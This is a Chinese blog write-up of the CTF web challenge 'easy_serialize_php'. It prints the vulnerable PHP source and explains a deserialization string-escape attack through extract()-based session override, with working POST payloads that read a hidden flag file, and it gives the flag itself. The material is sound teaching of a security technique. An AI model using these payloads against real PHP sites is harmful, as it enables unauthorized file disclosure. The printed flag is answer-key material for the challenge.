easy_serialize_php

最新推荐文章于 2022-10-16 18:28:21 发布
最新推荐文章于 2022-10-16 18:28:21 发布
阅读量426 收藏
点赞数
分类专栏: CTF Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beihai2013/article/details/112804570
版权

easy_serialize_php

考察:php代码审计,php序列化

打开页面,打开view-source,可以看到源代码

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

# 若已经拥有SESSION,则把SESSION删除
if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
# 将全局变量$_POST解开,相当于得到$user='guest',$function=$function
extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

根据代码,访问

http://220.249.52.134:58008/index.php?f=phpinfo

可以php的配置信息,并得到flag的可能地址

	d0g3_f1ag.php

那么按照常理,现在就应该是在URL上提交(GET方式)或POST数据提交,查看相关文件的操作了

注意,此处有一个关键要点是通过post方式提交_SESSION,修改_SESSION中的参数,来实现查看文件

根据代码

echo file_get_contents(base64_decode($userinfo['img']));

所以要把d0g3_f1ag.php在base64_encode后,填充入userinfo的img下标中

而userinfo又是由这一句得到

$userinfo = unserialize($serialize_info);

serialize_info由$SESSION得到

$serialize_info = filter(serialize($_SESSION));

而SESSION会经过filter,且其中的img标签会被修改

f(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

根据wp,使用php序列化的逃逸,构成下列payload(下面有解析)

_SESSION[flagflag]=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

_SESSION[flagflag]=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mbGxsbGxsYWc=";}

得到flag

cyberpeace{cb08b7952dfbcf0ed90a8d07db20e139}

php反序列化逃逸原理

首先序列化格式

array(2) { 
    [0]=> string(8) "Hed9eh0g" 
    [1]=> string(5) "aaaaa" 
}
序列化后会得到
'a:2:{i:0;s:8:"Hed9eh0g";i:1;s:5:"aaaaa";}';

其次,序列化有一种特点,若在序列化过程中,有一些字符被过滤替换为空,会尝试向后读取相同位数字符。如下flag被过滤的情况

a:3:{
    s:4:"user";
        s:24:"flagflagflagflagflagflag";
    s:8:"function";
        s:59:"a";
        s:3:"img";
        s:20:"ZDBnM19mMWFnLnBocA==";
        s:2:"dd";
        s:1:"a";}";
    s:3:"img";
        s:20:"L2QwZzNfZmxsbGxsbGFn";}

a:3:{
    s:4:"user";
        s:24:"";
    s:8:"function";
        s:59:"a";
    s:3:"img";
        s:20:"ZDBnM19mMWFnLnBocA==";
        s:2:"dd";
        s:1:"a";}";
    s:3:"img";
        s:20:"L2QwZzNfZmxsbGxsbGFn";}

因此,可以构造序列化字符串,绕过相关过滤

本题中逃逸的解析

未过滤前
_SESSION[flagflag]=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
序列化后
a:2:{
	s:8:"flagflag";
	s:58:"
		";s:3:"aaa";
		s:3:"img";
		s:20:"ZDBnM19mMWFnLnBocA==";}
	";
	s:3:"img";
	s:20:"Z3Vlc3RfaW1nLnBuZw==";
}
过滤后
a:2:{
	s:8:"";
	s:58:"
		";s:3:"aaa";
		s:3:"img";
		s:20:"ZDBnM19mMWFnLnBocA==";}
	";
	s:3:"img";
	s:20:"Z3Vlc3RfaW1nLnBuZw==";}
反序列化填充后,再序列化时
a:2:{
	s:8:"s:58:"";"; // 字符串里的东西随便填
		s:3:"aaa";
	s:3:"img";
		s:20:"ZDBnM19mMWFnLnBocA==";}
	";
	s:3:"img";
	s:20:"Z3Vlc3RfaW1nLnBuZw==";}
beihai2013
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
grpc_serialize_example
02-14
grpc_serialize_example ex) protoc -I . proto/metric.proto --python_out=.ex) protoc -I . proto/metric.proto --go_out=.
[安洵杯 2019]easy_serialize_php(有思考过程)
v2ish1yan的博客
04-20 2992
[安洵杯 2019]easy_serialize_php 反序列化
easy_serialize_php(反序列化字符逃逸)
weixin_45007073的博客
03-16 991
前言 今天突然想起来代码审计好像很久没搞了,在网上找到了个2019的安洵杯的题目。题目的考点是反序列化字符逃逸,通过字符的逃逸我们才能拿到对应的flag值。 反序列化原理 我们要了解反序列化字符逃逸的原理,首先就要先了解反序列化的原理,我们先举个简单的例子帮助理解和分析。 <?php $img["one"] = "flag"; $img["two"] = "test"; $a = serialize($img); var_dump($a); $b = unserialize($a); va
buuctf easy_serialize_php
qq_52671379的博客
03-30 1860
buuctf easy_serialize_php
[安洵杯 2019]easy_serialize_php--序列化绕过,extract()函数。
cainiao17441898的博客
06-06 323
解题: 打开源码: <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESS
BUUCTF刷题记录(4)
bmth666的博客
04-12 1270
文章目录web[ACTF2020 新生赛]Upload web [ACTF2020 新生赛]Upload 和之前极客大挑战一样的题,上传后缀为phtml即可 连上蚁剑,即可得到flag
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
使用 MFC 串行化数据和 C++ 对象,三个简单的例子程序
se_mouz_image.rar_serialize_序列化
09-23
实现利用serialize()函数序列化文档和鼠标画一些简单的图形的功能.
ts_serialize:零依赖库,用于序列化数据
05-19
:bowl_with_spoon: ts_serialize 零依赖库,用于序列化数据。 ts_serialize可以帮助您: 将camelCase类成员转换为snake_case JSON属性以与REST API一起使用从REST API有效负载中排除内部字段将数据类型转换为内部...
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
BUUCTF - Web - easy_serialize_php
1tachi的博客
12-07 394
文章目录源码分析知识点payload其他解法 源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){
[安洵杯 2019]easy_serialize_php
最新发布
Yb_140的博客
10-16 458
变量覆盖+反序列化字符串逃逸
CTF第十二天
qq_52680097的博客
06-05 158
[安洵杯 2019]easy_serialize_php 前几天学了点反序列化,今天练练手 简单地说下序列化和反序列化后的格式 序列化后的结果是一串字符串。 反序列化会解开序列化的字符串生成相应类型的数据。 <?php $function = @$_GET['f'];//得到f传入的参数 //对输入的$img参数进行检验 function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g');//定义一些字符
buuctf web easy_serialize_php1
qq_41696858的博客
12-09 481
审计源码 <?php $function = @$_GET['f']; //正则匹配 function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SES
web buuctf [安洵杯 2019]easy_serialize_php
weixin_44214568的博客
04-02 405
考点:反序列化逃逸 这个题目是一道php代码审计题目,打开就是源码, <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pr
UNCTF2021-easyserialize
m0_61666690的博客
12-07 475
前言 算是第一次独立做出来的一道web题,想了我两天。。。 本题利用到的知识点: 1.PHP反序列化字符逃逸 UNCTF2020的一道easyunserialize,类似 2.目录穿越 UNCTF2020的一道easy_ssrf,类似 3.pop链 BUUCTF的ezpop,类似 灵感就来源于这两道题 一、源码 二、POP链构造 1.function.php 先看哪里可以利用到flag 可以看到me7eorite这个类里有readfile函数,可以用来读flag 但是有
BUUCTF之[安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和代码审计
weixin_44632787的博客
07-28 1400
BUUCTF之[安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和代码审计 知识点 反序列化中的对象逃逸 extract()变量覆盖 虽然这题说很easy,但是一点都不easy。我花了好长的时间才能看懂。但是里面的知识点却很有意思,希望我能记下来… 废话不多说,放代码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值